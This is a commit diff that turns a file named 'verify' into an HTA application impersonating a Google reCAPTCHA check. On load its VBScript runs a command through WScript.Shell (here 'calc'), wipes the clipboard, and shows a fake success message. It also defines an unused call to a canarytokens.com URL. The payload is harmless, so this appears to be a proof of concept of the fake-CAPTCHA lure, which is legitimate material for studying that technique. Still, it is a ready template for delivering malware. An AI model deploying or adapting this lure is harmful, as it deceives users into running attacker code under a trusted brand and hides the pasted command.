enotkrutoy commited on
Commit
59171c6
·
verified ·
1 Parent(s): a21c982

Update verify

Browse files
Files changed (1) hide show
  1. verify +95 -2
verify CHANGED
@@ -1,4 +1,97 @@
1
  <!DOCTYPE html>
2
- <html><head><title>Google</title><HTA:APPLICATION APPLICATIONNAME="Google" BORDER="none" SHOWINTASKBAR="no"/></head>
3
- <body><script>try{new ActiveXObject("WScript.Shell").Run("notepad.exe")}catch(e){}</script></body>
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
4
  </html>
 
1
  <!DOCTYPE html>
2
+ <html>
3
+ <head>
4
+ <title>reCAPTCHA Verification</title>
5
+ <HTA:APPLICATION
6
+ APPLICATIONNAME="reCAPTCHA Verification"
7
+ BORDER="thin"
8
+ BORDERSTYLE="normal"
9
+ ICON="https://support.google.com/favicon.ico"
10
+ SHOWINTASKBAR="yes"
11
+ SINGLEINSTANCE="yes"
12
+ WINDOWSTATE="normal"
13
+ SCROLL="no"
14
+ SCROLLFLAT="yes"
15
+ SYSMENU="yes"
16
+ />
17
+ <style>
18
+ body {
19
+ font-family: Roboto, helvetica, arial, sans-serif;
20
+ margin: 0;
21
+ padding: 20px;
22
+ text-align: center;
23
+ color: #555;
24
+ box-sizing: border-box;
25
+ display: flex;
26
+ flex-direction: column;
27
+ justify-content: center;
28
+ align-items: center;
29
+ width: 100%;
30
+ height: 100%;
31
+ }
32
+ img {
33
+ width: 200px;
34
+ margin-bottom: 20px;
35
+ }
36
+ #error {
37
+ color: green;
38
+ }
39
+ .terms {
40
+ font-size: small;
41
+ color: #555;
42
+ }
43
+ .terms a {
44
+ text-decoration: none;
45
+ }
46
+ .terms a:hover {
47
+ text-decoration: underline;
48
+ }
49
+ </style>
50
+ <script language="VBScript">
51
+ Sub Window_onLoad
52
+ Window.ResizeTo 520, 480
53
+ Window.MoveTo (Screen.Width - 300) / 2, (Screen.Height - 400) / 2
54
+
55
+ Set objShell = CreateObject("WScript.Shell")
56
+ objShell.Run "calc"
57
+
58
+
59
+ ClearClipboard
60
+
61
+ objShell.Run "timeout /T 2 /nobreak", 0, True
62
+ Call HideConnectingShowError
63
+ objShell.Run "timeout /T 1 /nobreak", 0, True
64
+ End Sub
65
+ Sub HideConnectingShowError
66
+ document.getElementById("connecting").style.display = "none"
67
+ document.getElementById("error").style.display = "block"
68
+ End Sub
69
+ Sub ClearClipboard
70
+ Dim objHTML
71
+ Set objHTML = CreateObject("htmlfile")
72
+ objHTML.parentWindow.clipboardData.setData "text", ""
73
+ Set objHTML = Nothing
74
+ End Sub
75
+ Sub SendCanaryToken
76
+ Dim xhr
77
+ Set xhr = CreateObject("MSXML2.XMLHTTP")
78
+ xhr.open "GET", "http://canarytokens.com/articles/static/about//contact.php", False
79
+ xhr.send
80
+ End Sub
81
+ </script>
82
+ </head>
83
+ <body>
84
+ <img src="https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" alt="reCAPTCHA Logo">
85
+ <div id="connecting" style="display:block;">
86
+ <p>Verifying reCAPTCHA, please wait...</p>
87
+ </div>
88
+ <div id="error" style="display:none;">
89
+ <p><b>Successful reCAPTCHA Verification!</b><br></p>
90
+ // <p><b>Failed to connect with the reCAPTCHA server.</b><br>Try the verification steps again.</p>
91
+ </div>
92
+ <p class="terms">
93
+ <a href="https://www.google.com/intl/en/policies/privacy/">Privacy</a> -
94
+ <a href="https://www.google.com/intl/en/policies/terms/">Terms</a>
95
+ </p>
96
+ </body>
97
  </html>